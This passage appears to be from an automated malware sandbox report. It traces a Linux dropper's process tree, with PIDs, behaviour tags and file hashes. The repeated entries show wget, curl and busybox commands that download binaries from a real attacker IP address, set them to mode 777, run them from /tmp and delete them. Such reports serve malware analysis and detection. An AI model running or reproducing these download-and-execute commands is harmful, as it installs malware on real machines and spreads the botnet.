/bin/chmodchmod 777 NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk./NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm NFeJKcU5vM2cxOr3ANURxAJUCxHmAfeIxk2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵PID:871
-
-
/bin/chmodchmod 777 jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/jbkBazKADCANOq2el15iaIH9fETZUnZ8iX./jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm jbkBazKADCANOq2el15iaIH9fETZUnZ8iX2⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵PID:880
-
-
/bin/chmodchmod 777 efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY./efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm efOwqJ2rQESD5sVTrVjjYxzFrhlUOWerxY2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe2⤵PID:888
-
-
/bin/chmodchmod 777 BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe./BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm BcxGPiOqgM9IzhbqY5W1gFcEsPhHcOqqDe2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s2⤵PID:894
-
-
/bin/chmodchmod 777 jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s./jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm jHJOpHVm4mrg3VZchDfDYSwDm99p65TW4s2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵PID:900
-
-
/bin/chmodchmod 777 LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s./LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm LvsL164UndggdfQBD5gaS5kdHebhr4Wl3s2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY2⤵PID:906
-
-
/bin/chmodchmod 777 vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY./vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm vIVi2OkAo5qN5sEjcQ9CRkjBSLO4RfjxkY2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA2⤵PID:912
-
-
/bin/chmodchmod 777 2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA./2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm 2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz2⤵PID:918
-
-
/bin/chmodchmod 777 oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz./oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw932⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw932⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw932⤵PID:924
-
-
/bin/chmodchmod 777 OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw932⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93./OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw932⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw932⤵PID:927
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97